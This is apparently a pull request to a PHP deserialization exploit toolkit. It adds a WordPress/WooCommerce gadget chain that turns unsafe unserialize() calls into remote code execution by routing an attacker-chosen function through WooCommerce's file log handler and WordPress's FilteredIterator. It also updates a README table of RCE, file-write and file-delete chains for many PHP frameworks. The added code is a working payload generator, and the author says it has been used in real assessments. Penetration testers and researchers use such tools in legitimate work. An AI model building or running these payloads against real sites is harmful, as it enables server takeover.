### PR TITLE
Adds Wordpress WooCommerce GadgetChain

### DIFF
--- a/README.md
+++ b/README.md
@@ -21,34 +21,38 @@ Gadget Chains
 -------------
 
 NAME                  VERSION               TYPE             VECTOR         I    
-CodeIgniter4/RCE1     4.0.0-beta.1 <= ?     rce              __destruct
-Doctrine/FW1          ?                     file_write       __toString     *    
-Drupal7/RCE1          7.0.8 < ?             rce              __destruct     *    
-Guzzle/FW1            6.0.0 <= 6.3.2        file_write       __destruct          
-Guzzle/RCE1           6.0.0 <= 6.3.2        rce              __destruct          
-Laravel/RCE1          5.4.27                rce              __destruct          
-Laravel/RCE2          5.5.39                rce              __destruct          
-Laravel/RCE3          5.5.39                rce              __destruct     *    
-Laravel/RCE4          5.5.39                rce              __destruct          
-Magento/SQLI1         ? <= 1.9.3.4          sql_injection    __destruct          
-Magento/FW1           ? <= 1.9.4.0          file_write       __destruct     *
-Monolog/RCE1          1.18 <= 1.23          rce              __destruct          
-Monolog/RCE2          1.5 <= 1.17           rce              __destruct          
-Phalcon/RCE1          <= 1.2.2              rce              __wakeup       *    
-Slim/RCE1             3.8.1                 rce              __toString          
-SwiftMailer/FW1       5.1.0 <= 5.4.8        file_write       __toString          
-SwiftMailer/FW2       6.0.0 <= 6.0.1        file_write       __toString          
-SwiftMailer/FW3       5.0.1                 file_write       __toString          
-SwiftMailer/FW4       4.0.0 <= ?            file_write       __destruct          
-Symfony/FW1           2.5.2                 file_write       DebugImport    *    
-Symfony/FW2           3.4                   file_write       __destruct          
-Symfony/RCE1          3.3                   rce              __destruct     *    
-Symfony/RCE2          2.3.42 < 2.6          rce              __destruct     *    
-Symfony/RCE3          2.6 <= 2.8.32         rce              __destruct     *    
-Yii/RCE1              1.1.20                rce              __wakeup       *    
-ZendFramework/RCE1    ? <= 1.12.20          rce              __destruct     *    
-ZendFramework/RCE2    1.11.12 <= 1.12.20    rce              __toString     *    
-ZendFramework/RCE3    2.0.1 <= ?            rce              __destruct
+CodeIgniter4/RCE1             4.0.0-beta.1 <= ?     rce              __destruct          
+Doctrine/FW1                  ?                     file_write       __toString     *    
+Drupal7/FD1                   7.0 < ?               file_delete      __destruct     *    
+Drupal7/RCE1                  7.0.8 < ?             rce              __destruct     *    
+Guzzle/FW1                    6.0.0 <= 6.3.2        file_write       __destruct          
+Guzzle/INFO1                  6.0.0 <= 6.3.2        phpinfo()        __destruct     *    
+Guzzle/RCE1                   6.0.0 <= 6.3.2        rce              __destruct     *    
+Laravel/RCE1                  5.4.27                rce              __destruct          
+Laravel/RCE2                  5.5.39                rce              __destruct          
+Laravel/RCE3                  5.5.39                rce              __destruct     *    
+Laravel/RCE4                  5.5.39                rce              __destruct          
+Magento/FW1                   ? <= 1.9.4.0          file_write       __destruct     *    
+Magento/SQLI1                 ? <= 1.9.4.0          sql_injection    __destruct          
+Monolog/RCE1                  1.18 <= 1.23          rce              __destruct          
+Monolog/RCE2                  1.5 <= 1.17           rce              __destruct          
+Phalcon/RCE1                  <= 1.2.2              rce              __wakeup       *    
+Slim/RCE1                     3.8.1                 rce              __toString          
+SwiftMailer/FW1               5.1.0 <= 5.4.8        file_write       __toString          
+SwiftMailer/FW2               6.0.0 <= 6.0.1        file_write       __toString          
+SwiftMailer/FW3               5.0.1                 file_write       __toString          
+SwiftMailer/FW4               4.0.0 <= ?            file_write       __destruct          
+Symfony/FW1                   2.5.2                 file_write       DebugImport    *    
+Symfony/FW2                   3.4                   file_write       __destruct          
+Symfony/RCE1                  3.3                   rce              __destruct     *    
+Symfony/RCE2                  2.3.42 < 2.6          rce              __destruct     *    
+Symfony/RCE3                  2.6 <= 2.8.32         rce              __destruct     *       
+WordPress/WooCommerce/RCE1    3.4.0 <= ?            rce              __destruct     *    
+Yii/RCE1                      1.1.20                rce              __wakeup       *    
+ZendFramework/FD1             ? <= 1.12.20          file_delete      __destruct          
+ZendFramework/RCE1            ? <= 1.12.20          rce              __destruct     *    
+ZendFramework/RCE2            1.11.12 <= 1.12.20    rce              __toString     *    
+ZendFramework/RCE3            2.0.1 <= ?            rce              __destruct       
 ```
 
 Every gadget chain has:

--- a/gadgetchains/WordPress/RCE/WooCommerce1/chain.php
+++ b/gadgetchains/WordPress/RCE/WooCommerce1/chain.php
@@ -1,0 +1,19 @@
+<?php
+
+namespace GadgetChain\WordPress\WooCommerce;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE
+{
+    public static $version = '3.4.0 <= ?';
+    public static $vector = '__destruct';
+    public static $author = 'erwan_lr';
+    public static $informations = 'Demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&feature=youtu.be&t=1763';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \WC_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function));
+    }
+}

--- a/gadgetchains/WordPress/RCE/WooCommerce1/gadgets.php
+++ b/gadgetchains/WordPress/RCE/WooCommerce1/gadgets.php
@@ -1,0 +1,39 @@
+<?php
+
+// WooCommerce - https://plugins.trac.wordpress.org/browser/woocommerce/trunk/includes/log-handlers/class-wc-log-handler-file.php
+class WC_Log_Handler_File {
+	protected $handles = array();
+
+	// Custom constructor to set the $handles more easily
+	public function __construct($handles) {
+		$this->handles = $handles;
+	}
+
+	/*
+	public function __destruct() {
+		foreach ( $this->handles as $handle ) {
+			if ( is_resource( $handle ) ) {
+				fclose( $handle ); // @codingStandardsIgnoreLine.
+			}
+		}
+	}
+	*/
+}
+
+// WordPress - https://github.com/WordPress/WordPress/blob/6fd8080e7ee7599b36d4528f72a8ced612130b8c/wp-includes/Requests/Utility/FilteredIterator.php
+class Requests_Utility_FilteredIterator extends ArrayIterator {
+	protected $callback;
+
+	public function __construct($data, $callback) {
+		parent::__construct($data);
+		$this->callback = $callback;
+	}
+
+	/*
+	public function current() {
+		$value = parent::current();
+		$value = call_user_func($this->callback, $value);
+		return $value;
+	}
+	*/
+}


### PR DESCRIPTION
Not a RCE directly in WooCommerce but can be used as a chain, see the BSide Manchester Conf about it https://www.youtube.com/watch?v=GePBmsNJw6Y&feature=youtu.be&t=1763.

I've used it in real case scenario during assessments where WordPress plugins had unserialize() statements with unvalidated user data and the blogs had the WooCommerce plugin installed.

I had to play with the folder naming a bit, as `WordPress/WooCommerce/RCE1` didn't work

I've also updated the Readme to reflect the latest GadgetChains added, including this one